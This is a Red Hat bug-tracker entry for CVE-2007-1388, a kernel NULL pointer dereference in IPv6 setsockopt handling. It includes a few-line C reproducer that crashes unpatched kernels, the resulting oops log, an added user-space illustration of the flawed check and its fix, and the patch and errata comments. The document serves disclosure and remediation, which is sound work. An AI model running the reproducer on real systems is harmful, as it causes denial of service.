Bug 232255 - CVE-2007-1388 NULL pointer dereference in do_ipv6_setsockopt
Summary: CVE-2007-1388 NULL pointer dereference in do_ipv6_setsockopt
Keywords:
Status: CLOSED ERRATA
Alias: None
Product: Red Hat Enterprise Linux 5
Classification: Red Hat
Component: kernel
Version: 5.0
Hardware: All
OS: Linux
Priority: medium
Severity: high
Target Milestone: ---
Target Release: ---
Assignee: Don Howard
QA Contact: Martin Jenner
URL:
Whiteboard: impact=important,source=vendorsec,rep...
Depends On:
Blocks:
 
Reported: 2007-03-14 16:00 UTC by Marcel Holtmann
Modified: 2007-11-30 22:07 UTC (History)

Fixed In Version: RHSA-2007-0169
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2007-04-30 16:37:48 UTC




Links:
Red Hat Product Errata RHSA-2007:0169 (priority normal, status SHIPPED_LIVE): Important: kernel security and bug fix update, last updated 2007-04-30 16:36:50 UTC

Description Marcel Holtmann 2007-03-14 16:00:56 UTC
There is a NULL pointer dereference in the function do_ipv6_setsockopt in
net/ipv6/ipv6_sockglue.c.
Line 417: opt can be NULL and is dereferenced:
		opt = ipv6_renew_options(sk, np->opt, optname,    // opt = NULL
					 (struct ipv6_opt_hdr __user *)optval,
					 optlen);
		if (IS_ERR(opt)) {
			retv = PTR_ERR(opt);
			break;
		}

		/* routing header option needs extra check */
		if (optname == IPV6_RTHDR && opt->srcrt) {        // Oops


These few lines reproduce the bug:

#include <netinet/in.h>
#include <sys/socket.h>   /* socket(), setsockopt() */

int main(int argc, char **argv) {
  int s, optval;

  s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
  /* optlen 0: ipv6_renew_options() returns NULL, which the IS_ERR() check does not catch */
  setsockopt(s, SOL_IPV6, IPV6_RTHDR, &optval, 0);

  return 0;
}


Kernel Oops here:

Mar  8 23:57:17 localhost kernel: BUG: unable to handle kernel NULL pointer
dereference at virtual address 00000010
Mar  8 23:57:17 localhost kernel:  printing eip:
Mar  8 23:57:17 localhost kernel: f8ebb270
Mar  8 23:57:17 localhost kernel: *pde = 00000000
Mar  8 23:57:17 localhost kernel: Oops: 0000 [#1]
Mar  8 23:57:17 localhost kernel: Modules linked in: binfmt_misc rfcomm hidp
l2cap bluetooth fglrx speedstep_centrino cpufreq_userspace cpufreq_stats
freq_table cpufreq_powersave cpufreq_ondemand cpufreq_conservative video
tc1100_wmi sbs sony_acpi pcc_acpi i2c_ec i2c_core hotkey dev_acpi button battery
container ac asus_acpi dm_mod md_mod sr_mod sbp2 scsi_mod ipv6 parport_pc lp
parport 8139cp joydev tsdev usbhid pcmcia tifm_7xx1 tifm_core sdhci mmc_core
8139too mii snd_intel8x0 snd_ac97_codec snd_ac97_bus ipw2200 snd_pcm_oss
snd_mixer_oss yenta_socket rsrc_nonstatic pcmcia_core snd_pcm ieee80211
ieee80211_crypt psmouse serio_raw evdev snd_timer shpchp pci_hotplug intel_agp
agpgart snd soundcore snd_page_alloc rtc ext3 jbd ohci1394 ieee1394 ehci_hcd
uhci_hcd usbcore ide_generic ide_cd cdrom ide_disk piix generic thermal
processor fan capability commoncap vesafb fbcon tileblit font bitblit softcursor
Mar  8 23:57:17 localhost kernel: CPU:    0
Mar  8 23:57:17 localhost kernel: EIP:    0060:[<f8ebb270>]    Tainted: P      VLI
Mar  8 23:57:17 localhost kernel: EFLAGS: 00010246   (2.6.17-11-386 #2) 
Mar  8 23:57:17 localhost kernel: EIP is at ipv6_setsockopt+0xa90/0xc40 [ipv6]
Mar  8 23:57:17 localhost kernel: eax: 00000000   ebx: f0cfca40   ecx: 00000039
  edx: 00000000
Mar  8 23:57:17 localhost kernel: esi: 00000000   edi: 00000000   ebp: 00000039
  esp: f25a9da8
Mar  8 23:57:17 localhost kernel: ds: 007b   es: 007b   ss: 0068
Mar  8 23:57:17 localhost kernel: Process null_deref (pid: 5076,
threadinfo=f25a8000 task=f24a7580)
Mar  8 23:57:17 localhost kernel: Stack: 00000000 00000000 c199ce00 f8c9a4ff
00000001 00000000 f0cfce58 ee42e9c0 
Mar  8 23:57:17 localhost kernel:        c18e1e7c c0179c74 3b9aca00 c199ce00
c18e1de0 ee42e9c0 c18e1e7c 00000000 
Mar  8 23:57:17 localhost kernel:        c199ce00 00000000 ee42e9c0 c18e1e7c
00000000 c013c78b 00001000 c0359330 
Mar  8 23:57:17 localhost kernel: Call Trace:
Mar  8 23:57:17 localhost kernel:  <c0179c74> __mark_inode_dirty+0x34/0x170 
<c013c78b> do_generic_mapping_read+0x42b/0x540
Mar  8 23:57:17 localhost kernel:  <c0154f74> cache_alloc_refill+0x314/0x4d0 
<c01cc98c> vsnprintf+0x55c/0x640
Mar  8 23:57:17 localhost kernel:  <c016f0b7> d_alloc+0x27/0x190  <c016f059>
d_instantiate+0x49/0x80
Mar  8 23:57:17 localhost kernel:  <f8eba7e0> ipv6_setsockopt+0x0/0xc40 [ipv6] 
<c0289966> tcp_setsockopt+0x36/0x370
Mar  8 23:57:17 localhost kernel:  <c0259e83> sock_common_setsockopt+0x23/0x30 
<c02587d5> sys_setsockopt+0x75/0xd0
Mar  8 23:57:17 localhost kernel:  <c0259a19> sys_socketcall+0x209/0x280 
<c02c7a00> do_page_fault+0x0/0x6e0
Mar  8 23:57:17 localhost kernel:  <c0102dbb> sysenter_past_esp+0x54/0x79 
Mar  8 23:57:17 localhost kernel: Code: 00 00 d0 54 2a c0 ff 0d 80 88 ee f8 83
3d 80 87 ee f8 02 0f 85 34 fc ff ff a1 08 89 ee f8 31 ff e8 56 ab 25 c7 e9 d5 f6
ff ff 90 <8b> 50 10 85 d2 0f 84 3e f9 ff ff 80 7a 02 00 90 75 13 0f b6 42 
Mar  8 23:57:17 localhost kernel: EIP: [<f8ebb270>] ipv6_setsockopt+0xa90/0xc40
[ipv6] SS:ESP 0068:f25a9da8
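Added illustration, not code from the report or from the RHEL patch: a user-space model of the IPV6_RTHDR path described above, showing why an IS_ERR() check alone lets the NULL return produced by the optlen-0 reproducer through, beside a check that tests the pointer before its member. The struct layouts and renew_options_model are simplified stand-ins for the kernel's.

```c
#include <errno.h>
#include <stddef.h>
#include <stdlib.h>

#define MAX_ERRNO 4095
/* Kernel-style error pointers: only the top MAX_ERRNO addresses encode an errno,
 * so IS_ERR(NULL) is false and a NULL return slips past an IS_ERR()-only check. */
static void *ERR_PTR(long err) { return (void *)err; }
static long PTR_ERR(const void *p) { return (long)p; }
static int IS_ERR(const void *p) { return (unsigned long)p >= (unsigned long)-MAX_ERRNO; }

struct ipv6_opt_hdr { unsigned char nexthdr, hdrlen; };
struct ipv6_txoptions { struct ipv6_opt_hdr *srcrt; };   /* routing header, if present */

/* Stand-in for ipv6_renew_options(): optlen == 0 deletes the option, and when no
 * options remain the result is NULL rather than an ERR_PTR. A runt header is an error. */
static struct ipv6_txoptions *renew_options_model(size_t optlen)
{
    if (optlen == 0)
        return NULL;
    if (optlen < sizeof(struct ipv6_opt_hdr))
        return ERR_PTR(-EINVAL);
    struct ipv6_txoptions *opt = calloc(1, sizeof *opt);
    if (!opt)
        return ERR_PTR(-ENOBUFS);
    opt->srcrt = calloc(1, sizeof *opt->srcrt);   /* pretend the header parsed cleanly */
    return opt;
}

/* Vulnerable shape of the check from the report: opt is dereferenced unconditionally,
 * so calling this with opt == NULL is exactly the oops above. */
static int rthdr_check_vulnerable(struct ipv6_txoptions *opt)
{
    return opt->srcrt != NULL;
}

/* Hardened shape: reject error pointers, then test the pointer before the member.
 * Returns 0 on success or a negative errno, mirroring the kernel's retv convention. */
static int rthdr_setsockopt_fixed(size_t optlen)
{
    struct ipv6_txoptions *opt = renew_options_model(optlen);
    if (IS_ERR(opt))
        return (int)PTR_ERR(opt);
    if (opt && opt->srcrt) {
        /* routing header validation would run here */
    }
    if (opt) { free(opt->srcrt); free(opt); }
    return 0;
}
```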

Comment 3 Don Howard 2007-03-29 21:41:56 UTC
A patch for this issue has been included in zstream build 2.6.18-8.1.2.el5.

Comment 5 Mike Gahagan 2007-04-26 22:13:28 UTC
Verified on x86_64 system.


Comment 7 Red Hat Bugzilla 2007-04-30 16:37:48 UTC
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2007-0169.html


